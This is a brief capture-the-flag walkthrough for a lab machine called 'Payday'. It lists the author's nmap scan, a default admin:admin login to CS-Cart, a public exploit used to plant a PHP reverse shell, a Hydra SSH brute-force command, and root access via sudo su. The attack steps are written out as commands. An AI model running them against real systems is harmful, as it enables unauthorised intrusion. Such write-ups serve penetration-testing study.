Payday
Use sudo su with full sudo rights
Summary
Discovered multiple open services including Apache, IMAP/POP3, Samba, and SSH.
CS-Cart web application on port 80 allowed default login as
admin:admin.Used exploit for CS-Cart to get RCE via PHP webshell.
SSH brute-forced user
patrick's credentials using Hydra.Privilege escalation via
sudo suaspatrickhad full sudo access.
🧵 Let's Unpack
🔎 Enumeration
nmap -A -T4 -sC -sN -oN nmapFull -p 22,80,110,139,143,445,993,995 192.168.167.39Port 80 hosted CS-Cart (Apache 2.2.4 with PHP 5.2.3)
IMAP, POP3, and SSL variants running via Dovecot
Samba open on ports 139 and 445
SSH running OpenSSH 4.6p1
⚡ Initial Foothold
Web login worked with default creds:
admin:adminUsed CS-Cart exploit EDB 48891 for RCE
Uploaded PHP reverse shell (Ivan Sincek’s from revshells.com)
Got a shell as
www-data
python -c 'import pty; pty.spawn("/bin/bash")'🪜 Privilege Escalation
SSH brute-force was required for user
patrick
hydra -L users.txt -P users.txt -e nsr -q ssh://192.168.167.39 -t 4 -w 5 -f
[22][ssh] host: 192.168.120.85 login: patrick password: patrick
# Login found: patrick : patrick
ssh patrick@192.168.167.39Full
sudoaccess forpatrickallowed immediate escalation:
# using SUdo
sudo -l
>
User patrick may run the following commands on this host:
(ALL) ALL
# simply doing sudo su gave us root shell
sudo su
## Boom bot proof.txt
Last updated